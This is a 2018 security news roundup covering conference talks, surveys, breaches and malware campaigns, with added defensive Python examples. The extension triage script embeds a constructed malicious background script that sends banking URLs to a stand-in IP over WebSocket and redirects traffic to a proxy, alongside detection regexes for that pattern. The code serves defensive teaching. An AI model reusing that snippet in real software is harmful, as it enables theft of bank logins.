A persistent industry PR problem and over-prescriptive employer demands continue to frustrate efforts to close cyber-skills shortages, according to James Lyne.
“I’ve spoken to many people coming out of competitions saying ‘I didn’t realize there was a job in cybersecurity’ – so clearly there’s an advertising problem,” he argued.
Lyne also claimed that highly talented young cybersecurity enthusiasts find themselves presented with a huge barrier “to get onto the ladder of improvement” thanks to excessive demands from employers for professionals with several years’ experience.
“These are ridiculous problems in the face of industry skills gaps,” he argued.
Lyne explained how he ended up in cybersecurity via a circuitous and somewhat fortuitous route, claiming he may even have been tempted down a darker path had things worked out differently.
“I had a lot of online mentors at the time who I’ve never met who were hugely influential for me,” he said. “I think the biggest issue is showing people that there are good jobs here. At the moment it’s easier to offer anonymous hacking services on the dark web.”
Although Lyne admitted his career has been “filled with lucky interventions,” he’s working hard to ensure the next generation of cyber-enthusiasts don’t have to rely on luck to carve out a successful future in the industry.
He bemoaned the lack of focus in learning on understanding how things work, claiming modern tech professionals perhaps rely too much on off-the-shelf tools.
“We need to rebuild that ‘rip it apart’ culture,” said Lyne. “The level of understanding of how tech works has dropped off a cliff. Technology is just so usable out of the box.”
The government’s CyberFirst scheme, which Lyne was instrumental in developing, aims to achieve this by using gamification techniques to encourage more kids into the industry.
The former director general of GCHQ Robert Hannigan took to the keynote stage at Infosecurity Europe 2018 to discuss the evolving cyber-threat landscape, describing how – whilst changes in sophistication of lone actors and cyber-criminals are increasing the challenges of keeping data secure – it is the rise of nation state attacks that is “possibly the biggest change in the last couple of years.”
Hannigan said that risks surrounding nation state attacks have always been an area of concern to some extent, but recent changes in political intent have made them a real and significant issue in today’s landscape.
He pointed to activities in Iran and Russia as examples. “Iran have taken a very collaborated approach to cyber-activity, most publicly through the DDoS attacks on banks a few years ago,” Hannigan said, while at the higher end of sophistication Russia has put a lot of investment into cyber-activity over the last 10 years.
“The biggest change [with Russia] is intent; the kind of prepositioning of a cyber-attack could go all sorts of ways,” he explained, “but if your geopolitical intent changes and you want to take risks and you don’t mind being found out and want to be destructive, that suddenly becomes very dangerous. I think that is what has changed for the West, not just online but in other areas in the last few years with Russia.
“The fact that both the US and UK governments have been talking about finding Russia on utility energy company networks and the infrastructure of the internet is really important and worrying, because of the intent.”
Nation state activity is becoming more sophisticated and more brazen, Hannigan added, and the real concern when it comes to nation state attacks is that the “risk of miscalculation could be huge.”
“We haven’t yet seen anybody killed or seriously injured as a result of a cyber-attack, but if you start to tamper with industrial control systems, with health networks, it feels like it’s only a matter of time before somebody gets hurt and ultimately killed,” he said.
However, to conclude, Hannigan pointed out that 80% to 90% of cyber-attacks, regardless of their sophistication level, can be prevented or mitigated by doing the basics right.
“We should keep doing the basics,” he added, “and at a national level I’m really delighted with the progress the NCSC has made with active cyber-defense.”
A cultural and technological clash between IT and OT is hindering organizations’ efforts to mitigate the risk of serious cyber-physical attacks, according to Trend Micro.
The security giant’s VP of infrastructure strategies, Bill Malik, explained to Infosecurity Europe attendees that the fundamental goal of OT teams is to “ensure everything is safe and reliable.”
When it comes to information security teams, however, it’s all about ensuring data is not “lost, altered or disclosed.”
“These goals are out of mind for people running OT systems, so when you try to converge the two you end up with major conflict,” said Malik.
Where OT teams try to fix an issue as quickly as possible in order to preserve the integrity of the service, IT security teams want to find out what went wrong to prevent it happening again, he added.
“When you have people with expertise in their own domains working together, it results in a kind of ‘ritual combat’,” said Malik. “The biggest challenge is integrating their viewpoints.”
Another example of the disparity between the two ways of approaching cybersecurity is the DevOps concept of “fail fast and fix fast.”
“Let me tell you: 'fail fast' doesn’t work when you’re fixing a connected car, or a robotic surgery,” warned Malik.
The job of security managers is complicated further by the mass of different protocols used in the IoT world to enable communication between devices and controllers.
In healthcare, these challenges are compounded by the fact that medical devices in the US take 2-5 years to get certified, but if the software is upgraded they risk losing that certification. This means out-of-date and insecure platforms like Windows XP are not uncommon, warned Malik.
“Whether we’re talking about a power station, a hospital or your Alexa at home we need to be able to identify all vulnerable devices, ensure they’re properly segmented and know what activity is going on,” concluded Malik.
He added that organizations need to upgrade where possible to ensure devices are as secure as they can be, and to support modern, secure IoT architectures, as well as plan for regulatory mandates.
Europe’s new NIS Directive should go some way to helping improve the resilience of “essential services” providers to cyber-physical attacks, by raising baseline security standards. In the UK it applies to transport, energy, healthcare, water and other CNI sectors.
A third of global business decision makers said they’d rather cut costs by paying a ransomware demand than invest in security, according to NTT Security.
The managed security giant polled 1800 business leaders around the world to compile its Risk:Value 2018 report.
Worryingly it revealed that only around half of businesses are prepared to invest proactively in cybersecurity.
Most of them are doing so to prevent the damage to customer confidence (56%), and brand and reputation (52%) that can result from a breach.
Even more concerning, nearly half (47%) of respondents said they had not been affected by a data breach, despite less than half (48%) claiming to have secured all their critical data. In the UK, nearly a quarter (22%) don’t even know whether they have suffered a breach or not.
“We’re seeing almost unprecedented levels of confidence among our respondents to this year’s report, with almost half claiming they have never experienced a data breach. Some might call it naivety and perhaps suggests that many decision makers within organizations are simply not close enough to the action and are looking at one of the most serious issues within business today with an idealistic rather than realistic view,” said NTT Security’s senior VP EMEA, Kai Grunwitz.
“This is reinforced by that worrying statistic that more than a third globally would rather pay a ransom demand than invest in their cybersecurity, especially given the big hike in ransomware detections and headline-grabbing incidents like WannaCry. While it’s encouraging that many organizations are prepared to take a long-term, proactive stance, there are still signs that many are still prepared to take a short-term, reactive approach to security in order to drive down costs.”
The estimated cost to recover from an incident has increased from $1.4m to $1.5m since last year. However, on the plus side, global respondents claimed it would take 57 days to recover from a breach, down from 74 days in 2017. In the UK the figure is lower still at 47 days.
After noticing a browser extension communicating with a suspicious domain, researchers analyzed the Google Chrome extension named Desbloquear Conteudo (“unblock content”) and found that it was a rare example of banker malware.
The extension, detected as HEUR:Trojan-Banker.Script.Generic, has been removed from the Chrome Web Store. According to Kaspersky Lab researcher Vyacheslav Bogdanov, the man-in-the-middle (MitM) extension for Chrome targeted users of Brazilian online banking services with the goal of collecting logins and passwords in order to pilfer their savings.
In a MitM attack the attacker inserts themselves between the victim and the site they are trying to reach. The target believes they are connected directly to the legitimate site, but the flow of traffic to and from the real bank is actually relayed through infrastructure the attacker controls, so the criminal can read and alter it and harvest the personal data they are after.
What's interesting about this particular extension is that the developers made no effort to obfuscate its source code. Instead, they opted for a MitM attack using "the WebSocket protocol for data communication, making it possible to exchange messages with the C&C [command-and-control] server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank."
Bogdanov also suggested that the extension had an additional function: adding cryptocurrency mining scripts to the banking sites users visited.
“Browser extensions aimed at stealing logins and passwords are quite rare in comparison to adware extensions, but given the possible damage that they can cause, it is worth taking them seriously. We recommend choosing proven extensions that have a large number of installations and reviews in the Chrome Web Store or other official services. After all, despite the protection measures taken by the owners of such services, malicious extensions can still penetrate them,” Bogdanov said.
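A practical check prompted by the above: because this extension's code was not obfuscated, the MitM pattern is visible in a static review of the unpacked package. The script below is an added example, not Kaspersky Lab's tooling. The sample manifest and background script are constructed to show the pattern (blanket host permissions, a blocking webRequest listener that redirects, and a plaintext WebSocket channel to a raw IP) and are not the real extension's files; the permission and source heuristics are assumptions to tune for your own review.

```python
"""Static triage of an unpacked Chrome extension for the man-in-the-middle
pattern described above: blanket permissions plus a WebSocket back-channel
through which banking traffic is proxied. Added example, not Kaspersky Lab's
analysis tooling; the manifest and background script are constructed
stand-ins, not the real extension's files, and the heuristics are assumptions."""
import json
import re
from typing import Dict, List

# Host patterns that grant access to every site (Manifest V2 syntax, current in 2018).
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Assumption: a locally maintained pattern for the sites you care about.
SENSITIVE_HOST_RE = re.compile(r"bank|banco", re.I)

# Source-level patterns worth a human look.
SOURCE_PATTERNS = [
    ("PLAINTEXT_WEBSOCKET", re.compile(r"new\s+WebSocket\(\s*['\"]ws://")),
    ("WEBSOCKET", re.compile(r"new\s+WebSocket\(")),
    ("WEBREQUEST_REDIRECT", re.compile(r"onBeforeRequest[\s\S]*?redirectUrl")),
    ("FORM_CAPTURE", re.compile(r"addEventListener\(\s*['\"]submit['\"]")),
]

# Constructed sample manifest (not the real extension's).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Sample Extension",
    "version": "1.0",
    "permissions": ["webRequest", "webRequestBlocking", "tabs", "<all_urls>"],
    "content_scripts": [{"matches": ["*://*.exemplo-banco.com.br/*", "https://*/*"],
                         "js": ["inject.js"]}],
    "background": {"scripts": ["bg.js"]},
})

# Constructed sample background script showing the C&C-as-proxy pattern.
SAMPLE_BG_JS = """
var ws = new WebSocket('ws://203.0.113.10:8080/');
chrome.webRequest.onBeforeRequest.addListener(function (d) {
  if (/banco/.test(d.url)) {
    ws.send(d.url);
    return {redirectUrl: 'http://203.0.113.10/proxy?u=' + encodeURIComponent(d.url)};
  }
}, {urls: ['<all_urls>']}, ['blocking']);
"""


def audit_manifest(manifest_text: str) -> List[str]:
    """Finding codes for permission combinations that let an extension read or
    redirect traffic on every site, or inject into the sites that matter."""
    manifest = json.loads(manifest_text)
    perms = set(manifest.get("permissions", []))
    findings = []
    if perms & BROAD_HOSTS:
        findings.append("BROAD_HOST_PERMISSION")
    if {"webRequest", "webRequestBlocking"} <= perms:
        findings.append("BLOCKING_WEBREQUEST")   # can cancel, modify or redirect requests
    for cs in manifest.get("content_scripts", []):
        matches = set(cs.get("matches", []))
        if matches & BROAD_HOSTS:
            findings.append("BROAD_CONTENT_SCRIPT")
        if any(SENSITIVE_HOST_RE.search(p) for p in matches):
            findings.append("CONTENT_SCRIPT_ON_SENSITIVE_HOST")
    return findings


def scan_source(js: str) -> List[str]:
    """Finding codes for the source patterns above; only useful when, as in
    this case, the code is not obfuscated."""
    return [code for code, rx in SOURCE_PATTERNS if rx.search(js)]


def triage(manifest_text: str, scripts: Dict[str, str]) -> dict:
    """Combine both views and give a verdict a reviewer can act on."""
    report = {"manifest": audit_manifest(manifest_text),
              "scripts": {name: scan_source(src) for name, src in scripts.items()}}
    codes = set(report["manifest"]).union(*report["scripts"].values())
    proxies_traffic = {"BLOCKING_WEBREQUEST", "WEBREQUEST_REDIRECT"} <= codes
    phones_home_from_bank = {"WEBSOCKET", "CONTENT_SCRIPT_ON_SENSITIVE_HOST"} <= codes
    report["verdict"] = "suspicious" if proxies_traffic or phones_home_from_bank else "review"
    return report


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, {"bg.js": SAMPLE_BG_JS}), indent=2))
```

Run it against the unpacked directory of any extension you are asked to approve; a "suspicious" verdict is a reason to read the code, not proof of malice, since legitimate ad blockers also use blocking webRequest on every site.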
Israeli genealogy site MyHeritage has revealed details of a breach affecting over 92 million users.
The DNA testing service claimed in a statement on Monday that a security researcher contacted its CISO after finding a file containing the data on a private server outside of the company.
The details contained “all the email addresses of users who signed up to MyHeritage up to October 26, 2017, and their hashed passwords.”
The firm claimed that there’s no evidence the data has been used by the hackers or that any other MyHeritage systems, such as those containing card information or DNA data, were compromised.
“Immediately upon receipt of the file, MyHeritage’s Information Security Team analyzed the file and began an investigation to determine how its contents were obtained and to identify any potential exploitation of the MyHeritage system,” the statement continued.
“We determined that the file was legitimate and included the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach. MyHeritage does not store user passwords, but rather a one-way hash of each password, in which the hash key differs for each customer. This means that anyone gaining access to the hashed passwords does not have the actual passwords.”
The firm has acted swiftly to set up an incident response team and an independent forensic review and said it will be rolling out 2FA to users soon. There’s also a 24/7 security customer support team on hand to answer any questions.
In the meantime, it urged users to change their passwords.
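The scheme the statement describes, a one-way hash with a key that differs for each customer, is per-user salted password hashing. The following is an added worked example of that scheme and not MyHeritage's code: the choice of PBKDF2-HMAC-SHA256, the iteration count and the salt length are assumptions, since the disclosure does not say which function the company uses.

```python
"""Per-user salted one-way password hashing of the kind MyHeritage's
statement describes. Added example: the KDF (PBKDF2-HMAC-SHA256), the
iteration count and the salt length are assumptions, not details from the
disclosure."""
import hashlib
import hmac
import os
from typing import Dict, Optional, Tuple

ITERATIONS = 100_000   # assumption; raise as hardware allows
SALT_BYTES = 16        # assumption; 16 random bytes is plenty to make salts unique


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest).

    A fresh random salt per user (the 'hash key that differs for each customer'
    in the statement) means two users with the same password get different
    stored values, so an attacker holding the leaked table cannot attack every
    account at once with one precomputed table: each hash must be cracked on
    its own.
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time, so the
    comparison itself does not leak how many leading bytes matched."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def build_user_table(users: Dict[str, str]) -> Dict[str, Tuple[bytes, bytes]]:
    """The most a leaked credential file should contain: email -> (salt, hash).
    The plaintext password is never written anywhere."""
    return {email: hash_password(pw) for email, pw in users.items()}


if __name__ == "__main__":
    table = build_user_table({"alice@example.com": "correct horse",
                              "bob@example.com": "correct horse"})
    # Same password, different salt: the stored digests differ.
    print(table["alice@example.com"][1] != table["bob@example.com"][1])
    salt, digest = table["alice@example.com"]
    print(verify_password("correct horse", salt, digest),
          verify_password("wrong", salt, digest))
```

Salting forces an attacker to crack each of the 92 million hashes separately, but it does not make weak passwords safe: a leaked salted table can still be attacked offline by guessing common passwords one account at a time, which is why the advice to change passwords and the planned 2FA rollout still matter. The email addresses, which were stored in the clear, are usable for phishing regardless.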
Commentators were broadly sympathetic to MyHeritage, claiming it did most of the security basics right.
“This breach of MyHeritage seems to be the rare instance in which a company in possession of sensitive data adhered to some of the best practices in password posture by not storing them in plain text but as one-way hashes,” said Balbix CEO, Gaurav Banga. “It’s unfortunate that user email addresses were exposed, but by partitioning servers, using third parties for payment processing and encrypting passwords, MyHeritage has — at least so far — minimized the damage of this breach.”
The common vulnerabilities found in IoT devices are just as prevalent in adult toys.
Speaking on “Hacking Adult Toys” at Infosecurity Europe, Ken Munro from Pen Test Partners looked at a number of adult devices, some of which had basic authentication levels, static ID which enabled them to be controlled remotely and open ports for identification.
Munro highlighted some toys which were paired for multiple user sessions, while the Lovense vibrator has a standard Bluetooth PIN of 0000 and can be controlled by an Android app which stores, and never deletes, temporary image files.
Referring to research by Alberto Segura, Munro said that the Chrome plug-in for the toy could identify a user as an online cam model simply from their email address.
In another case, a male toy could be controlled by Bluetooth, and inflate the inside of the toy remotely. Another toy’s mobile app “continuously probes for outbound connections” and if a user has connected this to a work phone, the person’s IT department will face multiple alerts. “By using this device you’re effectively telling your employer that you’re a cam model,” Munro said.
In other cases, Munro showed a Fleshlight toy that has a static link that never changes, while butt plugs can be geolocated and controlled via Bluetooth.
Munro demonstrated that code from a camera drone had been reused in a sex toy with a camera, which had a static IP address and “admin” as the username, meaning it could stream video in real time “completely unprotected.”
In terms of disclosure, Munro said that a number of emails had been sent to manufacturers, but they had received no response.
“We have pushed hard for manufacturers to improve security, and porn is big business and we were shocked at the state of adult toys,” he said. “Vulnerabilities we knew about ten years ago are being sold to people and used in intimate situations.”
He concluded by naming Brad Render for his work in disclosure to adult toy manufacturers, and encouraged delegates to start making manufacturers listen: “to get their security sorted, as SSL is not in place, there is pinning and pairing and no encryption used, and the firmware is a train wreck - so do have a play and see security flaws and tell us and get them fixed.”
Researchers have discovered a traffic manipulation and cryptocurrency mining campaign infecting organizations across industries from finance to education and government. The Operation Prowli campaign has been spreading malware and malicious code to servers and websites around the world, and more than 40,000 machines reportedly have been infected.
The GuardiCore Labs team found that by using exploits, password brute-forcing and weak configurations, the attackers have had widespread success with the Prowli campaign. Targeting a variety of platforms, from CMS servers hosting popular websites to backup servers running HP Data Protector and DSL modems, the multipurpose operation also goes after IoT devices.
Relying on cryptocurrency mining and traffic redirection, the campaign has already victimized more than 9,000 companies. Traffic monetization fraud is a growing trend, in which attackers use tech support scams and promote fake websites to lure unsuspecting users away from legitimate sites; once redirected to the fake site, users are induced to click on malicious browser extensions.
First identified on 4 April, a group of secure-shell (SSH) attacks were discovered communicating with a command-and-control (C&C) server. "The attacks all behaved in the same fashion, communicating with the same C&C server to download a number of attack tools named r2r2 along with a cryptocurrency miner," GuardiCore wrote.
The researchers were able to trace the campaign around the world across several networks and found the campaign associated with different industries. "Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations. These attacks led us to investigate the attackers’ infrastructure and discover a wide ranging operation attacking multiple services."
The financially motivated attackers appeared to be targeting indiscriminately, going after any domain that exposed a wide range of services to the internet. “Prowli exploits known vulnerabilities across WordPress, Joomla!, SMB, and even some DSL modems, so automated patching, along with continuous assessment and remediation, is critical to avoid these types of attacks," said Brajesh Goyal, VP of engineering, Cavirin.
These types of crypto-jacking attacks are escalating, said Dan Hubbard, chief security architect at Lacework. "Attackers are also utilizing everything from mobile devices to taking over accounts in large-scale public cloud computing environments in order to launch specific high-performance GPU workload types."
Examining network traffic will help users discover whether they've been infected. GuardiCore also advised that segmentation is a good practice, as is routinely reviewing who and what can access the servers. "Keep this list to a minimum and pay special attention to IoT devices whose credentials cannot be changed. Monitoring connections would easily show compromised devices communicating with cryptocurrency mining pools."
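Two of the checks GuardiCore's advice implies, as an added example rather than GuardiCore's own tooling: flagging hosts that connect to cryptocurrency mining pools, flagging SSH brute-force sources of the kind that opened the investigation, and reviewing successful logins from outside the networks you expect. The connection and sshd log lines are constructed, and the pool port list, pool hostnames, allowed subnets and thresholds are assumptions to be tuned per environment.

```python
"""Connection-monitoring and access-review checks of the kind GuardiCore
recommends against Prowli-style campaigns. Added example, not GuardiCore's
tooling: the log formats, the port and host lists, the subnets and the
thresholds are assumptions, and every log line below is constructed."""
import ipaddress
import re
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Assumption: ports commonly used by stratum mining pools; tune to your environment.
MINING_PORTS = {3333, 4444, 5555, 7777, 8888, 14444, 45700}
# Assumption: a locally maintained list of known pool hostnames.
MINING_HOSTS = {"pool.example-xmr.net", "stratum.example-pool.org"}

# Constructed connection log: ts,src,dst,dport,proto,dst_host ('-' if unresolved)
CONN_LOG = """\
1528100000,10.0.5.21,203.0.113.40,3333,tcp,pool.example-xmr.net
1528100005,10.0.5.21,93.184.216.34,443,tcp,www.example.com
1528100010,10.0.7.9,198.51.100.8,14444,tcp,-
1528100015,10.0.7.9,198.51.100.8,14444,tcp,-
1528100020,10.0.1.4,93.184.216.34,80,tcp,www.example.com
1528100025,10.0.9.2,203.0.113.77,443,tcp,stratum.example-pool.org
"""

# Constructed sshd lines in the usual syslog form.
AUTH_LOG = """\
Jun  4 10:01:02 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 51234 ssh2
Jun  4 10:01:03 web1 sshd[2201]: Failed password for root from 198.51.100.7 port 51235 ssh2
Jun  4 10:01:04 web1 sshd[2203]: Failed password for invalid user admin from 198.51.100.7 port 51236 ssh2
Jun  4 10:01:05 web1 sshd[2205]: Failed password for invalid user oracle from 198.51.100.7 port 51237 ssh2
Jun  4 10:01:06 web1 sshd[2207]: Failed password for root from 198.51.100.7 port 51238 ssh2
Jun  4 10:01:09 web1 sshd[2209]: Accepted publickey for deploy from 10.0.1.4 port 40022 ssh2
Jun  4 10:02:11 web1 sshd[2211]: Failed password for root from 192.0.2.33 port 60001 ssh2
Jun  4 10:03:40 web1 sshd[2215]: Accepted password for root from 203.0.113.5 port 40101 ssh2
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\d+\.\d+\.\d+\.\d+)")


def find_mining_connections(conn_log: str) -> List[Tuple[str, str, int, str]]:
    """Unique (src, dst, dport, reason) tuples for connections that look like
    mining-pool traffic, judged by destination port and/or resolved hostname."""
    hits = set()
    for line in conn_log.splitlines():
        if not line.strip():
            continue
        _ts, src, dst, dport, _proto, host = line.split(",")
        reasons = []
        if int(dport) in MINING_PORTS:
            reasons.append("pool-port")
        if host in MINING_HOSTS:
            reasons.append("pool-host")
        if reasons:
            hits.add((src, dst, int(dport), "+".join(reasons)))
    return sorted(hits)


def find_ssh_bruteforce(auth_log: str, threshold: int = 5) -> Dict[str, dict]:
    """Sources with at least `threshold` failed SSH logins, plus the usernames tried."""
    failures = Counter()
    usernames = defaultdict(set)
    for line in auth_log.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            usernames[ip].add(user)
    return {ip: {"failures": n, "usernames": sorted(usernames[ip])}
            for ip, n in failures.items() if n >= threshold}


def unexpected_logins(auth_log: str, allowed_nets: List[str]) -> List[Tuple[str, str]]:
    """Successful SSH logins from outside the networks you expect: the
    'review who and what can access the servers' check."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    out = []
    for line in auth_log.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.groups()
            if not any(ipaddress.ip_address(ip) in net for net in nets):
                out.append((user, ip))
    return out


if __name__ == "__main__":
    for hit in find_mining_connections(CONN_LOG):
        print("mining-pool traffic:", hit)
    for ip, info in find_ssh_bruteforce(AUTH_LOG).items():
        print("brute force from", ip, info)
    print("logins from outside allowed nets:", unexpected_logins(AUTH_LOG, ["10.0.0.0/8"]))
```

Port-based matching alone produces false positives (3333 and 8888 are used by plenty of legitimate software), so treat a port hit without a hostname hit as a lead to confirm, and feed the sources flagged by the brute-force check into your perimeter blocklist before they find the one host with a guessable password.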
At Infosecurity Europe 2018 security researcher James Lyne explored some of the latest tactics and techniques currently being deployed by cyber-criminals, with particular focus on how 2018 has seen the continued evolution of ransomware to become even more commoditized and business-like.
“I almost feel boring standing here talking about ransomware, as we must all be sick of the topic by now,” he said, “but there’s some quite interesting commercial and business model stuff happening.”
We’re all pretty comfortable with the effectiveness of ransomware, he added, and the fact that it is going to continue to be a part of the ongoing threat. “Its brilliance is its ubiquitous applicability to all of us – stealing credit cards, targeting specific data, going after usernames and passwords, and ransomware struck on the gold of a model where they [attackers] don’t need to care about what data you have, just that you care about your data.
“Since January, there’s been a series of campaigns that are worth paying attention to,” he said. “They are ransomware-as-a-service campaigns offering some interesting new features.”
An example Lyne pointed to was a “web-based interface where you can set some options, customize the ransom price, the address and so on, click build and download and get delivered a nice, constructed up-to-date piece of malware that authors have put effort into making sure the security community isn’t going to detect.”
They’ve even started giving security advice: “we recommend you to download the file without the .exe extension so you don’t accidentally run it!”
Another new ransomware service Lyne highlighted is one that is “free for download and use – so we have ‘freemium ransomware’ – who wants to pay for a service in 2018? You login, generate your malicious code and you distribute it, but the difference is, unlike the products and services of before where you owned the ransomware, it’s now an advertising referral scheme. So you generate your malware, you distribute it, and this other criminal gang receives the money and pays you 40% of the profits – so there’s no upfront investment, no difficulties in dealing with the digital currency and potentially getting caught, you don’t even own the people you hack anymore! That’s how commoditized we are – people have options on referral cuts on compromising our computers.”
IT leaders are prioritizing improvements in cybersecurity at a growing rate in an effort to fight cybercrime threats and become GDPR compliant, reports the Harvey Nash/KPMG CIO Survey 2018.
More than one-third of organizations surveyed in April reported that they did not expect to be compliant by the recent GDPR deadline, though 68% report that they have the support needed from their boards to ramp up investments to bring them into compliance.
“The seeming inevitability of a cyber attack crosses all borders and has now crossed firmly over the threshold for board-level discussions,” Akhilesh Tuteja, global cyber security services co-leader, KPMG International, said in a press release.
“Protecting the business from a cyber attack has jumped further up the boardroom agenda than any other item and IT leaders are being encouraged to make their defences the best that they can be,” Tuteja said.
David Ferbrache OBE, chief technology officer in KPMG's cybersecurity practice, said that data privacy and cybersecurity are closely intertwined. "With the introduction of the GDPR, privacy has become very much a front line issue. It was no surprise to see that 38% of survey respondents said they would ‘still be on the journey’ at the GDPR start date and only 15% said their compliance programme would be ‘complete’. "
Less than a quarter (22%) of respondents stated that they are in a good position to respond to a cyber-attack despite the overwhelming number of IT leaders (77%) whose greatest concern is the threat of organized cybercrime.
In addition, many organizations are in the nascent stages of their digital strategies, with most digital investment focused on the front end rather than on operational activities. According to the survey, 78% of CIOs believe their digital strategy is – at best – moderately effective, with only 32% of organizations reporting to have an enterprise-wide digital strategy.
Those organizations that have a dedicated chief digital officer (CDO) are more than twice as likely to have an all-encompassing digital strategy. "The incessant rise of shadow IT, the explosive growth of the CDO and the changing nature of technology have removed many of the certainties that have fueled the importance of the CIO role," Ferbrache said.
A relatively new role, the CDO is responsible for driving the value of digital in a business across technology and operations. "It has less legacy and baggage than more traditional roles like the CIO, although many CIOs would argue that they are CDOs in everything but job title."
Half of all IT leaders now report having either a dedicated or acting CDO, but Ferbrache noted that 40% of organizations do not have a CDO and did not indicate plans to establish such a role. "The size of the IT budget is directly proportional to the likelihood of having a dedicated CDO, with larger organisations much more likely to have one."
The introduction of AI and machine learning should not mean a decision of man or machine, but one of man and machine bringing combined skills together.
Speaking at Infosecurity Europe 2018 on 'Building Security That Works: Machine Learning Fundamentals for Cybersecurity Professionals', Christopher Morales, head of security analytics at Vectra Networks, admitted that there is confusion around what AI, machine learning and deep learning are.
“AI is the output of what you’re trying to do, and doing things that are repetitive tasks,” he said. “Machine learning is the method and the means to AI, but it is not AI itself.”
Morales went on to say that deep learning is part of machine learning, and there are two types: supervised or unsupervised. Supervised means it is task driven, “you give it input and have X data and you get Y output.” With unsupervised, he explained that you “have the X but no Y, a set of data and no outputs.”
Explaining unsupervised machine learning, Morales said that as conference delegates “we’ve been clustered by a vendor."
He went on to address algorithms, saying that if you have a single algorithm and you’re using it to do a job, that is not really AI, that is about using the right tool for the job. “Look at the task and who administrates the system, and if you want to find a remote access trojan, that is a good use of supervised learning as you are being specific on what you are looking for and how to apply it,” he said.
Moving on to how this can help with security, Morales said that pattern matching has been done for years, and users have focused on understanding what malware is, and with machine learning you can focus on what it does rather than what it is – and match it to that decision.
“Focus on behavior and how it relates to an attack, and focus on what to do and what it is doing to you now.”
He went on to encourage users to train systems on a subset of tools and what it looks like when an attacker wants to get on your network, and apply it to the network so it looks for any tool doing the same behavior.
“Unsupervised learning is good at learning local context and what people do, and in this case security research on what an attacker actually does,” he said.
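To make the X-and-Y distinction concrete, the following added example (not Vectra's code) trains a supervised nearest-centroid classifier on constructed, labelled behaviour features of the sort Morales describes (what a host does, not what binary it runs), then runs unsupervised k-means over unlabelled observations of the same features to find the local structure. The features, the figures and both algorithms are illustrative assumptions; it runs in plain Python with no ML library.

```python
"""Supervised versus unsupervised learning on attacker-behaviour features, in
the sense Morales describes (model what a thing does, not what it is).
Added example in pure Python with no ML library; the features, the figures
and the two algorithms (nearest-centroid, k-means) are illustrative
assumptions, not Vectra's models."""
import math
from collections import defaultdict
from typing import Dict, List, Sequence, Tuple

Point = Tuple[float, float, float]

# Each host is summarised by three behavioural features, all in [0, 1]:
#   beacon_regularity : how evenly spaced its outbound connections are
#   same_host_ratio   : share of connections going to one external host
#   small_payload     : share of connections carrying under ~2 KB
# A remote access trojan beacons on a schedule, to one host, with tiny payloads;
# a browsing user does none of those consistently.
LABELLED: List[Tuple[Point, str]] = [       # constructed training data: X with Y
    ((0.95, 0.98, 0.90), "rat"),
    ((0.90, 0.95, 0.85), "rat"),
    ((0.97, 0.99, 0.92), "rat"),
    ((0.20, 0.30, 0.20), "benign"),
    ((0.10, 0.40, 0.30), "benign"),
    ((0.30, 0.20, 0.15), "benign"),
]
UNLABELLED: List[Point] = [                 # constructed observations: X, no Y
    (0.94, 0.97, 0.88), (0.15, 0.35, 0.25), (0.91, 0.96, 0.90),
    (0.25, 0.25, 0.10), (0.96, 0.99, 0.87), (0.05, 0.45, 0.35),
]


def dist(a: Sequence[float], b: Sequence[float]) -> float:
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def mean(points: Sequence[Sequence[float]]) -> Point:
    return tuple(sum(c) / len(points) for c in zip(*points))


# Supervised: task driven, X in and Y out. The "model" is one centroid per label.
def train_centroids(labelled: List[Tuple[Point, str]]) -> Dict[str, Point]:
    groups = defaultdict(list)
    for x, y in labelled:
        groups[y].append(x)
    return {y: mean(xs) for y, xs in groups.items()}


def classify(model: Dict[str, Point], x: Point) -> str:
    """Label a new host by the closest class centroid; it finds only the
    behaviours it was taught (the RAT case Morales mentions)."""
    return min(model, key=lambda y: dist(x, model[y]))


# Unsupervised: X only. k-means finds the structure in the local population.
def kmeans(points: List[Point], k: int = 2, max_iter: int = 100):
    centroids = [points[i] for i in range(k)]  # assumption: deterministic init from the first k points
    assignments = None
    for _ in range(max_iter):
        new = [min(range(k), key=lambda j: dist(p, centroids[j])) for p in points]
        if new == assignments:
            break
        assignments = new
        for j in range(k):
            members = [p for p, a in zip(points, assignments) if a == j]
            if members:
                centroids[j] = mean(members)
    return assignments, centroids


def cluster_to_review(points: List[Point]) -> List[Point]:
    """Hosts in the cluster whose centroid looks most beacon-like; with no
    labels available this is where an analyst's attention goes first."""
    assignments, centroids = kmeans(points)
    worst = max(range(len(centroids)), key=lambda j: centroids[j][0])
    return [p for p, a in zip(points, assignments) if a == worst]


if __name__ == "__main__":
    model = train_centroids(LABELLED)
    print(classify(model, (0.88, 0.90, 0.80)), classify(model, (0.25, 0.35, 0.10)))
    print(kmeans(UNLABELLED)[0])
    print(cluster_to_review(UNLABELLED))
```

The supervised model answers one question it was trained to answer ("is this a RAT?") and nothing else; the unsupervised pass answers "which hosts behave unlike the rest here?" without being told what a RAT is, which is the local-context strength Morales attributes to it. Neither replaces the analyst who decides what the odd cluster actually means.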
